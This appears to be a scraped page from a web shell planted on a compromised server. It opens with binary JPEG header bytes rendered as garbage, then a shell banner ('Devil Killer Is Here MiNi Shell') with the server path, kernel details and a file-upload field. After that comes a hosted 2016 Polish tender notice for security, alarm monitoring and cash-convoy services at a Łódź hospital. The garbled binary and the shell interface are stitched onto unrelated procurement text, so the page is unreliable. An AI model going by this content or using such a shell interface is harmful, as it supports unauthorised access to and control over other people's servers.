JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20160414/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20160414/40355-N-2016.html

<p class="kh_header"><b>Łódź: Świadczenie usługi ochrony osób i mienia na terenie Szpitala przy ul. Wólczańskiej 191/195, ul. Wileńskiej 37, obsługa szatni w budynku Ginekologii przy ul. Wileńskiej 37, monitorowanie obiektu Wojewódzkiego Ośrodka Diabetologii i Chorób Metabolicznych przy ul. Nowej 30/32 oraz konwojowanie - przewożenie gotówki z banku do Szpitala przy ul. Wólczańskiej 191/195.</b><br>
<b>Numer ogłoszenia: 40355 - 2016; data zamieszczenia: 14.04.2016</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b>
<!--zamówienia publicznego.</p>-->
<table class="text2">
<tr><td style="border: solid 1px; width:15px black; text-align: center;"><b>V</b></td>
<td>zamówienia publicznego</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>zawarcia umowy ramowej</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>ustanowienia dynamicznego systemu zakupów (DSZ)</td></tr>
</table>


<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Wojewódzki Specjalistyczny Szpital im. M. Pirogowa w Łodzi , ul. Wólczańska 191/195, 90-531 Łódź, woj. łódzkie, tel. 042 6371322, faks 042 6371322.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.pirogow.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Samodzielny publiczny zakład opieki zdrowotnej.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Świadczenie usługi ochrony osób i mienia na terenie Szpitala przy ul. Wólczańskiej 191/195, ul. Wileńskiej 37, obsługa szatni w budynku Ginekologii przy ul. Wileńskiej 37, monitorowanie obiektu Wojewódzkiego Ośrodka Diabetologii i Chorób Metabolicznych przy ul. Nowej 30/32 oraz konwojowanie - przewożenie gotówki z banku do Szpitala przy ul. Wólczańskiej 191/195..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest świadczenie usługi ochrony osób i mienia na terenie Szpitala przy ul. Wólczańskiej 191/195, ul. Wileńskiej 37, obsługa szatni w budynku Ginekologii przy ul. Wileńskiej 37, monitorowanie obiektu Wojewódzkiego Ośrodka Diabetologii i Chorób Metabolicznych przy ul. Nowej 30/32 oraz konwojowanie - przewożenie gotówki z banku do Szpitala przy ul. Wólczańskiej 191/195 ZP/32/2016.
3.1.2.	Szczegółowy opis przedmiotu zamówienia oraz wymagania zamawiającego określa załącznik nr 2 do SIWZ zwany również w dalszej części SIWZ - kosztorysem ofertowym.
3.2.	 Przedmiot zamówienia obejmuje:
3.2.1.	świadczenie usługi ochrony osób i mienia na terenie Szpitala przy ul. Wólczańskiej 191/195, ul. Wileńskiej 37, obsługa szatni w budynku Ginekologii przy ul. Wileńskiej 37, monitorowanie obiektu Wojewódzkiego Ośrodka Diabetologii i Chorób Metabolicznych przy ul. Nowej 30/32 oraz konwojowanie - przewożenie gotówki z banku do Szpitala przy ul. Wólczańskiej 191/ zgodnie z załącznikiem nr 2 do SIWZ: 
3.3.	Usługa winna być świadczona zgodnie z przepisami ustawy o ochronie osób i mienia z dnia 22 sierpnia 1997r (tekst jednolity Dz. U. 2014 poz. 1099 z późn. zm.)
4.	Wymagania odnośnie przedmiotu zamówienia:
4.1. Zakres usług:
Lp.	Rodzaj usługi	j.m.	Ilość  
1.		Dozór całodobowy obiektu ul. Wólczańska 191/195 - I posterunek 	godz.	4368
2.		Dozór  obiektu ul. Wólczańska 191/195 -  od 6oo  do 16 oo  w dni robocze  - II posterunek  	godz. 	1270
3.		Dozór całodobowy obiektu ul. Wileńska 37 - dwa posterunki 	godz.	8736
4.		Obsługa szatni  budynek Ginekologii - ul. Wileńska 37- od 7oo  do 19 oo  we wszystkie dni tygodnia 	godz. 	2184
5.		Konwój walorów pieniężnych	szt.	18
6.		Monitorowanie obiektu przy ul. Nowa 30/32	miesiące 	6
Jako dni nierobocze traktowane są wszystkie soboty, niedziele oraz święta państwowe.
4.1.	Wymagania ogólne dotyczące ochrony osób i mienia:
4.1.1.	świadczenie usługi ochrony osób i mienia na terenie Szpitala:
w Łodzi przy ul. Wólczańskiej 191/195 - 2 posterunki,
w Łodzi przy ul. Wileńskiej 37 - 2 posterunki. 
4.1.2.	Ochrona osób polegać będzie na działaniach Wykonawcy, mających na celu zapewnienie bezpieczeństwa życia i zdrowia osób znajdujących się na chronionym terenie,
4.1.3.	Ochrona mienia Zamawiającego polegać będzie na działaniach Wykonawcy zapobiegających przestępstwom przeciwko mieniu, polegającym w szczególności na kradzieży, włamaniu, wandalizmie a także powstaniu szkody wynikającej z tych zdarzeń. 
4.1.4.	 Ochrona mienia obejmuje mienie znajdujące się na terenie obiektów Zamawiającego. 
Przez mienie Zamawiającego, podlegające ochronie, należy rozumieć w szczególności środki trwałe wpisane do ewidencji Zamawiającego oraz wartości pieniężne znajdujące się na terenie chronionego obiektu i zabezpieczone w sposób uniemożliwiający ich utratę.  
4.3.	W ramach wykonywanej usługi  ochrony obiektów  i mienia wykonawca  zobowiązany będzie do :
4.3.1.	Przekazania protokółem zdawczo - odbiorczym do dyspozycji Dyrekcji Szpitala 9 szt. (w tym 4 szt. - ul. Wólczańska 191/195, 5 szt. - ul. Wileńska 37) pilotów przeciw- napadowych na cały czas obowiązywania  umowy. Piloty przeciw- napadowe winny być monitorowane przez wykonawcę. Operatorzy stacji monitorowania alarmów w razie uruchomienia alarmu z  pilota  p - napadowego zapewnią dojazd do obiektu grupy patrolowo - interwencyjnej posiadającej środki przymusu bezpośredniego. Czas dojazdu grupy interwencyjnej max.  6 min od momentu  uruchomienia pilota  p- napadowego
4.3.2.	Prowadzenia książki raportów z przebiegu dyżurów usług ochroniarskich, opisując wszystkie wydarzenia w ciągu zmiany (ew. zajścia i interwencje oraz w których ewidencjonowane będą również zaparkowane pojazd bez wywieszonych, widocznych kart wjazdowych - do wglądu nadzoru i zamawiającego).
4.3.3.	W celu uzupełnienia ochrony fizycznej obiektu na terenie Szpitala przy ul. Wólczańskiej 191/195  zainstalowany jest system dozoru wizyjnego, wraz z archiwizacją obrazu. System dozoru wizyjnego nie jest objęty gwarancją. Wykonawca w ramach umowy wykonywał będzie na własny koszt bieżącą konserwacje obecnie eksploatowanego systemu dozoru wizyjnego. Okresowe przeglądy konserwacyjne winny być przeprowadzone raz na 3 miesiące. Z każdego wykonanego przeglądu konserwacji urządzeń  należy przekazać protokół do Zamawiającego. W przypadku stwierdzenia, w czasie wykonywania czynności konserwacyjnych potrzeby wymiany zużytych lub uszkodzonych części wykonawca  sporządza stosowny protokół konieczności. Wykonawca w ramach umowy wykonywał będzie wszelkie naprawy systemu dozoru wizyjnego, ale przed wykonaniem naprawy wymagającej wymiany elementu systemu dozoru wizyjnego winien uzyskać zgodę zamawiającego na jej wykonanie. W tym celu każdorazowo winien być przedstawiony kosztorys ofertowy na piśmie do zaakceptowania przez zamawiającego. Koszty materiałów niezbędnych do przeprowadzenia takiej naprawy ponosić będzie Zamawiający.
Elementy systemu:
rejestrator Novus NDR-BA6416 uruchomiony w maju 2013 roku.
16 kamer; 2 kolorowe, 14 cz/b.
4.4.	Obiekt Wólczańska 191/195 
4.4.1.	I posterunek
Dozór całodobowy obiektu we wszystkie dni w tygodniu ( 7 dni) 
Posterunek usytuowany przy wjeździe głównym na teren Szpitala od strony ul. Wólczańskiej 191/195 obsługujący szlaban dla wjeżdżających na teren i wyjeżdżających samochodów. Pracownik ochrony wyposażony winien być w środki łączności z bazą firmy ochrony oraz pilot  p - napadowy, monitorowany przez wykonawcę. Czas dojazdu grupy interwencyjnej max.  6 min od momentu uruchomienia pilota  p- napadowego. Szlaban winien być cały czas zamknięty. Pracownik każdorazowo podchodząc do wjeżdżającego samochodu powinien sprawdzić czy pojazd wjeżdżający na teren szpitala posiada  kartę upoważniającą do wjazdu.  Zarówno pracownicy jak  i dostawcy wyposażeni są  przez Szpital w karty upoważniające do wjazdu na teren Szpitala. W przypadku dostawy tlenu do Szpitala , na szlabanie winna być wywieszona tabliczka - dostawa tlenu. Pracownik  ochrony zobowiązany jest do informowania wjeżdżających o innym sposobie wjazdu na teren szpitala.  W celu uzupełnienia ochrony fizycznej obiektu na terenie Szpitala zainstalowany jest system dozoru wizyjnego, wraz z archiwizacją obrazu. Wykonawca zobowiązany będzie do  całodobowego monitorowania  terenu Szpitala poprzez w/w system.
4.4.2.	II  posterunek
       Dozór  obiektu we wszystkie dni robocze*  w godz. -  od 6oo  do 16 oo
Jako dni nierobocze traktowane są wszystkie soboty, niedziele oraz święta państwowe.
Posterunek usytuowany jest przy bramie wjazdowej od ul. Stefanowskiego i wyposażony jest w szlaban. Szlaban winien być cały czas zamknięty. Pracownik każdorazowo podchodząc do wjeżdżającego samochodu powinien sprawdzić czy pojazd wjeżdżający na teren Szpitala posiada kartę upoważniającą do wjazdu. Zarówno pracownicy jak i dostawcy wyposażeni są  przez Szpital w karty upoważniające do wjazdu na teren Szpitala.   
Zadaniem Pracownika ochrony w godzinach od 6.00 do 16.00 będzie również  kontrola  kart upoważniających  do wjazdu na teren Szpitala w zaparkowanych samochodach na terenie obiektu. 
Pracownik ochrony podobnie jak na posterunku pierwszym wyposażony winien być w środki łączności z bazą firmy ochrony oraz pilot  p-napadowy, który w razie zagrożenia zapewni dojazd do obiektu grupy patrolowo - interwencyjnej posiadającej środki przymusu bezpośredniego. Czas dojazdu grupy interwencyjnej max. 6 min. od momentu uruchomienia pilota p-napadowego
4.5.	Obiekt  Wileńska 37
4.5.1.	I posterunek
Dozór całodobowy obiektu we wszystkie dni w tygodniu ( 7 dni) 
Posterunek usytuowany jest przy bramie wjazdowej od ul. Wileńskiej , wyposażony jest w szlaban. Szlaban winien być cały czas zamknięty. Pracownik każdorazowo podchodząc do wjeżdżającego samochodu powinien sprawdzić czy pojazd wjeżdżający na teren Szpitala posiada kartę upoważniającą do wjazdu. Zarówno pracownicy jak i Dostawcy wyposażeni są  przez Szpital w karty upoważniające do wjazdu na teren Szpitala.   
Zadaniem Pracownika ochrony będzie kontrola kart upoważniających  do wjazdu na teren Szpitala,  oraz po godz. 16 kontrola całego terenu.
Pracownik ochrony  wyposażony winien być w środki łączności z bazą firmy ochrony oraz pilot p - napadowy, który w razie zagrożenia zapewni dojazd do obiektu grupy patrolowo - interwencyjnej posiadającej środki przymusu bezpośredniego. Czas dojazdu grupy interwencyjnej max. 6 min. od momentu uruchomienia pilota p- napadowego. 
Ponadto do obowiązków pracownika ochrony należeć będzie: 
obsługa centrali telefonicznej,
wydawanie i przyjmowanie kluczy od pomieszczeń szpitalnych osobom upoważnionym do ich pobierania - prowadzenie ewidencji w tym zakresie, 
obsługa podjazdu  do izby przyjęć dla karetek ( kierowanie ruchem),
w okresie zimowym w godz. od 15.00 do 7.00 rano - utrzymywanie w czystości, odśnieżanie i posypywanie  mieszanką soli z piaskiem (zapewnia Zamawiający) podjazdu dla karetek oraz wejścia do budynku.
4.5.2.	II posterunek
Dozór całodobowy obiektu we wszystkie dni w tygodniu ( 7 dni)
Posterunek usytuowany jest w budynku Interny od strony ul. Karolewskiej. 
Pracownik ochrony wyposażony winien być w środki łączności z bazą firmy ochrony oraz pilot p - napadowy, który w razie zagrożenia zapewni szybki dojazd do obiektu grupy patrolowo - interwencyjnej posiadającej środki przymusu bezpośredniego. Czas dojazdu grupy interwencyjnej max. 6 min. od momentu uruchomienia pilota p- napadowego. Ponadto do obowiązków pracownika ochrony należeć będzie: 
bezpłatne obsługiwanie szatni dla odwiedzających chorych i studentów, 
obsługa podjazdu  do izby przyjęć dla karatek ( kierowanie ruchem),
wydawanie i przyjmowanie kluczy od pomieszczeń szpitalnych osobom upoważnionym do ich pobierania 
prowadzenie ewidencji w tym zakresie, 
w okresie zimowym w godz. od 15.00 do 7.00 rano - utrzymywanie w czystości, odśnieżanie i posypywanie  mieszanką soli z piaskiem (zapewnia Zamawiający) podjazdu dla karetek oraz wejścia do budynku,
we wszystkie dni  tygodnia w godz. od 15.00  do 7.00 rano - w razie potrzeby na oddziały szpitalne (budynku Interny i budynku Ginekologii) wykonawca zobowiązany będzie do transportu butli z gazami medycznym i technicznymi. Czynność ta każdorazowo  winna być odnotowana w książce raportów.
4.5.3	Obsługa szatni w  budynku Ginekologii i Położnictwa na terenie Szpitala przy ul. Wileńskiej 37
Obsługa szatni odbywać się będzie w godzinach od 7oo  do 19 oo - 7 dni w tygodniu.
Do obowiązków pracownika  obsługującego szatnię należeć będzie: 
obsługi bezpłatnej szatni dla odwiedzających chorych, studentów i pracowników,
przyjmowanie i wydawanie kluczy do pomieszczeń dydaktycznych oraz szatni dla studentów znajdujących się  budynku Ginekologii,
informowanie  o lokalizacji oddziałów i gabinetów lekarskich,
powiadamianie  telefonicznie na numer wewnętrzny 720 do dyżurnego pracownika szpitala obsługi technicznej o zauważonych awariach i innych  zdarzeniach ( np.  potłuczone szyby, rozlane płyny na podłogach ciągów komunikacyjnych itp.).
4.6.	Monitorowanie obiektu Wojewódzkiego Ośrodka Diabetologii i Chorób Metabolicznych przy ul. Nowa 30/32  
4.6.1.	Monitorowanie obiektu przy ul. Nowej 30/ 32 polega na całodobowym elektronicznym systemie dozoru ( brak posterunków). 
4.6.2.	Wykonawca w ramach umowy zobowiązany będzie do:
włączenia obiektu do systemu monitorowania, 
całodobowego monitorowania systemu alarmowego,    
po uruchomieniu alarmu  dojazd grup interwencyjnych, czas dojazdu grupy interwencyjnej max. 6 min od momentu uruchomienia alarmu.
4.7.	Konwojowanie - przewożenie gotówki
4.7.1.	Miejsce docelowe przewożonej gotówki z banku to siedziba Zamawiającego przy ul. Wólczańskiej 191/195.
Wartości konwojowanych środków pieniężnych  mieszczą się w przedziale od 0,2  jednostki obliczeniowej i nie przekraczają  1  jednostki obliczeniowej. Forma depozytu - kasa.
4.7.2.	Wykonawca zobowiązany będzie konwojować środki pieniężne od momentu ich przejęcia z banku do fizycznego przewiezienia do szpitala. Odpowiedzialność rozpoczyna się od pobrania i odejścia kasjera szpitala z Sali Operacyjnej  Banku do wejścia kasjera do pomieszczenia  kasowego w Szpitalu. 
4.7.3.	Konwojowanie odbywać się będzie średnio 3 razy w miesiącu w terminach wyznaczonych przez Zamawiającego według potrzeb  uzgodnionych telefonicznie z jednodniowym wyprzedzeniem.
4.8.	Wykonawca będzie zobowiązany do:
przestrzegania ogólnie obowiązujących w zakładach opieki zdrowotnej zasad i przepisów szczegółowych, a także wewnętrznych zarządzeń dyrekcji, oraz regulaminów organizacyjnych  i porządkowych jednostki.
posiadania ubezpieczenia odpowiedzialności cywilnej w okresie trwania umowy w zakresie wykonywanej usługi w wysokości 1 000 000,00 zł. 
ponoszenia całkowitej  odpowiedzialności za osoby wykonujące przedmiot umowy w zakresie przestrzegania  przez  nie kodeksu pracy, (w szczególności niestawienie się pracownika do pracy, lub  stan wskazujący na spożycie alkoholu itp.), zasad bhp, p - poż. oraz dodatkowych ustaleń wynikających z regulaminów wewnętrznych  Zamawiającego.
ponoszenia odpowiedzialności prawnej i finansowej za szkody powstałe z jego winy, a polegające na nieprawidłowym wykonaniu lub zaniedbaniu obowiązków dozoru i ochrony mienia wynikających  z zakresu wykonywanej usługi, a mogących przyczynić się do wyrządzenia szkody Zamawiającemu.
ponoszenia pełnej odpowiedzialności w zakresie wykonywanej usługi przed jednostkami kontrolującymi.
wyznaczenia osoby która będzie sprawować nadzór nad personelem oraz współpracować na bieżąco z Zamawiającym.
4.8.1	Wykonawca  będzie zobowiązany zapłacić Zamawiającemu kary umowne:
Zamawiający stwierdzając uchybienia w wykonywaniu obowiązków potwierdzonych protokołem podpisanym przez obie strony obciąży wykonawcę karą pieniężną w wysokości  do 500zł. (pięćset zł).
4.9.	Prawa  Zamawiającego:
Zamawiający zastrzega sobie prawo do przeprowadzania kontroli wykonywania usługi. 
Kontrole te będą przeprowadzane przynajmniej 2 razy w miesiącu i odnotowywane w książce raportów prowadzonej przez Wykonawcę. 
Zamawiający zastrzega sobie prawo do dokonywania wpisów wszelkich uwag, oraz wpisów o braku uwag  oraz notatek z przeprowadzanych kontroli dotyczących wykonywania usługi w książce raportów prowadzonej przez Wykonawcę. Osobą odpowiedzialną za wpis będzie ze strony Zamawiającego - Kierownik Działu Eksploatacji..</p>
<p><b>II.1.5)
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
<td><b>przewiduje się udzielenie zamówień uzupełniających</b></td></tr>
</table>                            
</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li>
<li></li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 79.70.00.00-4.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 09.11.2016.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> W niniejszym postępowaniu zamawiający nie żąda wniesienia przez wykonawców wadium.</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>posiadania uprawnień do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania, w tym zakresie tj. posiadają aktualne zezwolenie /koncesję wydane przez Ministra Spraw Wewnętrznych i Administracji w zakresie usług ochrony osób i mienia zgodnie z ustawą o ochronie osób i mienia z 22 sierpnia 1997r (tekst jednolity Dz. U. 2014 poz. 1099 z późn. zm.)</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>oświadczenie o spełnieniu warunku udziału określonego w pkt 9.1.3. SIWZ tj. dysponują:
1.	 minimum 3 (trzema) grupami interwencyjnymi z czasem dojazdu do obiektów Szpitala max. 6 minut od momentu uruchomienia przycisku p-napadowego lub alarmu, 
2.	 minimum 1 (jednym) samochodem przystosowanym do przewożenia wartości pieniężnych (nie przekraczających 1 jednostki obliczeniowej) wg wymogów Rozporządzenia Ministra Spraw Wewnętrznych i Administracji z dnia 7 września 2010r. w sprawie wymagań, jakim powinna odpowiadać ochrona wartości pieniężnych przechowywanych i transportowych przez przedsiębiorców i inne jednostki organizacyjne (Dz. U. z 2010r. nr 166 poz. 1128 z późn. zm.),
3. całodobowym centrum monitorowania.
oświadczenie należy sporządzić zgodnie z załącznikiem nr 8 do SIWZ</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Opłaconą polisę, a w przypadku jej braku inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia (dotyczy warunku udziału określonego w pkt 9.1.4 SIWZ). Do oferty należy dołączyć potwierdzenie opłacenia polisy lub fakt jej opłacenia musi wynikać z treści dokumentu. Jeżeli fakt opłacenia polisy nie wynika wprost z załączonego do oferty dokumentu, Wykonawca jest zobowiązany dołączyć inny dokument potwierdzający opłacenie składki (np. kopia przelewu składki, potwierdzenie ubezpieczyciela).</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">potwierdzenie posiadania uprawnień do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania, w szczególności koncesje, zezwolenia lub licencje;</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku, inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia.</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na zasoby innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
